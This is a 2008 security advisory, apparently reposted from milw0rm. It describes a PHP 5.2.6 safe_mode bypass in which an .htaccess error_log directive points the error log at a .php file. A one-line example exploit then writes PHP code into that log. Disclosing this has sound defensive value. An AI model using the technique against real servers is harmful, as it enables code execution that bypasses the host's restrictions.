PHP 5.2.6 error_log safe_mode Bypass Vulnerability

Document Sample
PHP 5.2.6 error_log safe_mode Bypass Vulnerability Powered By Docstoc
					                              PHP 5.2.6 error_log safe_mode Bypass Vulnerability                           Page 1/2
  1    [ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]
  2
  3    Author: Maksymilian Arciemowicz (cXIb8O3)
  4    securityreason.com
  5    Date:
  6    − − Written: 10.11.2008
  7    − − Public: 20.11.2008
  8
  9    SecurityReason Research
  10   SecurityAlert Id: 57
  11
  12   CWE: CWE−264
  13   SecurityRisk: Medium
  14
  15   Affected Software: PHP 5.2.6
  16   Advisory URL: http://securityreason.com/achievement_securityalert/57
  17   Vendor: http://www.php.net
  18
  19   − −−− 0.Description −−−
  20   PHP is an HTML−embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
  21   with a couple of unique PHP−specific features thrown in. The goal of the language is to allow web
  22   developers to write dynamically generated pages quickly.
  23
  24   error_log
  25
  26   They allow you to define your own error handling rules, as well as modify the way the errors can
  27   be logged. This allows you to change and enhance error reporting to suit your needs.
  28
  29   − −−− 0. error_log const. bypassed by php_admin_flag −−−
  30   The main problem is between using safe_mode in global mode
  31
  32   php.iniÂ-:
  33   safe_mode = On
  34
  35   and declaring via php_admin_flag
  36
  37   <Directory "/www">
  38   ...
  39           php_admin_flag safe_mode On
  40   </Directory>
  41
  42   When we create some php script in /www/ and try call to:
  43
  44   ini_set("error_log", "/hack/");
  45
  46   or in /www/.htaccess
  47
  48   php_value error_log "/hack/bleh.php"
  49
  50
  51   Result:
  52

SecurityReason                                                                                             11/20/2008
                             PHP 5.2.6 error_log safe_mode Bypass Vulnerability                                   Page 2/2
  53   Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned b
       y uid 1001 in Unknown on line 0
  54
  55   Warning: ini_set() [function.ini−set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to
       access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
  56
  57
  58   It was for safe_mode declared in php.ini. But if we use
  59
  60   php_admin_flag safe_mode On
  61
  62   in httpd.conf, we will get only
  63
  64   Warning: ini_set() [function.ini−set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to
       access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
  65
  66   syntax in .htaccess
  67
  68   php_value error_log "/hack/blehx.php"
  69
  70   is allowed and bypass safe_mode.
  71
  72   example exploit:
  73   error_log("<?php phpinfo(); ?>", 0);
  74
  75   − −−− 2. How to fix −−−
  76   Fixed in CVS
  77
  78   http://cvs.php.net/viewvc.cgi/php−src/NEWS?revision=1.2027.2.547.2.1315&view=markup
  79
  80   Note:
  81   Do not use safe_mode as a main safety.
  82
  83    −−− 3. Greets −−−
  84   sp3x Infospec schain p_e_a pi3
  85
  86   − −−− 4. Contact −−−
  87   Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
  88   Email: cxib [at] securityreason [dot] com
  89   GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
  90   http://securityreason.com
  91   http://securityreason.pl
  92
  93   # milw0rm.com [2008−11−20]




SecurityReason                                                                                                     11/20/2008

				
DOCUMENT INFO